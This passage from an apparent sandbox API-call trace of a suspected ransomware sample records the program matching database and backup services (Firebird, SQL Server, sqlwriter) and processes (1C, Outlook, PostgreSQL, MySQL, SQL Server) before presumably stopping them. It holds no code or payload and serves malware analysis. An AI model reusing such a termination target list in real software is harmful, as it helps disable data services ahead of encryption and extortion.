lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0249.211] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0249.211] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0249.211] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0249.211] lstrlenW (lpString="BFE") returned 3 [0249.211] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0249.211] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0249.211] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0249.211] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0249.211] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0249.211] lstrlenW (lpString="CryptSvc") returned 8 [0249.211] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0249.211] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0249.211] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0249.211] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0249.211] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0249.211] lstrlenW (lpString="CscService") returned 10 [0249.211] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0249.211] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0249.211] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0249.211] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0249.211] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0249.211] lstrlenW (lpString="DcomLaunch") returned 10 [0249.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0249.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0249.212] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0249.212] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0249.212] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0249.212] lstrlenW (lpString="Dhcp") returned 4 [0249.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0249.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0249.212] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0249.212] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0249.212] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0249.212] lstrlenW (lpString="Dnscache") returned 8 [0249.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0249.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0249.212] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0249.212] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0249.212] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0249.212] lstrlenW (lpString="DPS") returned 3 [0249.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0249.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0249.212] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0249.212] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0249.212] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0249.212] lstrlenW (lpString="eventlog") returned 8 [0249.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0249.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0249.212] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0249.212] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0249.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0249.213] lstrlenW (lpString="EventSystem") returned 11 [0249.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0249.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0249.213] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0249.213] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0249.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0249.213] lstrlenW (lpString="gpsvc") returned 5 [0249.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0249.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0249.213] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0249.213] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0249.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0249.213] lstrlenW (lpString="LanmanWorkstation") returned 17 [0249.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0249.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0249.213] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0249.213] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0249.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0249.213] lstrlenW (lpString="lmhosts") returned 7 [0249.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0249.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0249.213] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0249.213] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0249.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0249.213] lstrlenW (lpString="MMCSS") returned 5 [0249.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0249.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0249.213] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0249.213] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0249.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0249.214] lstrlenW (lpString="MpsSvc") returned 6 [0249.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0249.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0249.214] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0249.214] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0249.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0249.214] lstrlenW (lpString="NlaSvc") returned 6 [0249.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0249.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0249.214] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0249.214] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0249.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0249.214] lstrlenW (lpString="nsi") returned 3 [0249.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0249.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0249.214] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0249.214] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0249.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0249.214] lstrlenW (lpString="PcaSvc") returned 6 [0249.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0249.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0249.214] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0249.214] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0249.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0249.214] lstrlenW (lpString="PlugPlay") returned 8 [0249.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0249.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0249.215] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0249.215] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0249.215] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0249.215] lstrlenW (lpString="Power") returned 5 [0249.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0249.215] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0249.215] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0249.215] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0249.215] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0249.215] lstrlenW (lpString="ProfSvc") returned 7 [0249.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0249.215] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0249.215] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0249.215] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0249.215] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0249.215] lstrlenW (lpString="RpcEptMapper") returned 12 [0249.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0249.215] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0249.215] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0249.215] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0249.215] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0249.215] lstrlenW (lpString="RpcSs") returned 5 [0249.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0249.215] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0249.215] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0249.215] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0249.215] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0249.215] lstrlenW (lpString="SamSs") returned 5 [0249.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0249.215] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0249.215] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0249.215] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0249.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0249.216] lstrlenW (lpString="Schedule") returned 8 [0249.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0249.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0249.216] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0249.216] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0249.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0249.216] lstrlenW (lpString="SENS") returned 4 [0249.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0249.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0249.216] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0249.216] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0249.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0249.216] lstrlenW (lpString="ShellHWDetection") returned 16 [0249.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0249.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0249.216] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0249.216] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0249.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0249.216] lstrlenW (lpString="Spooler") returned 7 [0249.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0249.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0249.216] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0249.216] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0249.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0249.216] lstrlenW (lpString="SysMain") returned 7 [0249.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0249.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0249.217] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0249.217] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0249.217] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0249.217] lstrlenW (lpString="Themes") returned 6 [0249.217] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0249.217] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0249.217] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0249.217] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0249.217] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0249.217] lstrlenW (lpString="UxSms") returned 5 [0249.217] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0249.217] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0249.217] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0249.217] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0249.217] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0249.217] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dee5b0 | out: hHeap=0xb00000) returned 1 [0249.217] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x394 [0249.218] Process32FirstW (in: hSnapshot=0x394, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.219] Process32NextW (in: hSnapshot=0x394, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0249.219] lstrlenW (lpString="System") returned 6 [0249.219] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0249.219] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0249.219] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0249.219] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0249.219] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0249.219] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0249.219] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0249.219] Process32NextW (in: hSnapshot=0x394, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0249.220] lstrlenW (lpString="smss.exe") returned 8 [0249.220] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0249.220] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0249.220] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0249.220] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0249.220] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0249.220] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0249.220] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0249.220] Process32NextW (in: hSnapshot=0x394, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0249.220] lstrlenW (lpString="csrss.exe") returned 9 [0249.220] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0249.220] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0249.220] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0249.220] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0249.220] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0249.220] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0249.220] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0249.220] Process32NextW (in: hSnapshot=0x394, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0249.221] lstrlenW (lpString="wininit.exe") returned 11 [0249.221] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0249.221] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0249.221] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0249.221] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0249.221] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0249.221] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0249.221] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0249.221] Process32NextW (in: hSnapshot=0x394, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0249.221] lstrlenW (lpString="csrss.exe") returned 9 [0249.221] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0249.221] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0249.221] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0249.221] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0249.221] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0249.221] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0249.221] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0249.222] Process32NextW (in: hSnapshot=0x394, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0249.222] lstrlenW (lpString="winlogon.exe") returned 12 [0249.222] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0249.222] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0249.222] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0249.222] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0249.222] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0249.222] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0249.222] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0249.222] Process32NextW (in: hSnapshot=0x394, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0249.222] lstrlenW (lpString="services.exe") returned 12 [0249.222] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0249.222] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0249.223] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0249.223] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0249.223] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0249.223] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0249.223] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0249.223] Process32NextW (in: hSnapshot=0x394, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0249.223] lstrlenW (lpString="lsass.exe") returned 9 [0249.223] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0249.223] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0249.223] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0249.223] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0249.223] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0249.223] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0249.223] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0249.223] Process32NextW (in: hSnapshot=0x394, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0249.223] lstrlenW (lpString="lsm.exe") returned 7 [0249.223] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0249.223] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0249.224] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0249.224] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0249.224] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0249.224] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0249.224] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0249.224] Process32NextW (in: hSnapshot=0x394, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.224] lstrlenW (lpString="svchost.exe") returned 11 [0249.224] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0249.224] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0249.224] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0249.224] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0249.224] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0249.224] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0249.224] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0249.224] Process32NextW (in: hSnapshot=0x394, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.225] lstrlenW (lpString="svchost.exe") returned 11 [0249.225] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0249.225] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0249.225] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0249.225] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0249.225] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0249.225] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0249.225] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0249.225] Process32NextW (in: hSnapshot=0x394, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.225] lstrlenW (lpString="svchost.exe") returned 11 [0249.225] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0249.225] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0249.225] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0249.225] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0249.225] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0249.225] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0249.225] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0249.225] Process32NextW (in: hSnapshot=0x394, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.225] lstrlenW (lpString="svchost.exe") returned 11 [0249.226] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0249.226] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0249.226] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0249.226] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0249.226] lstrcmpiW 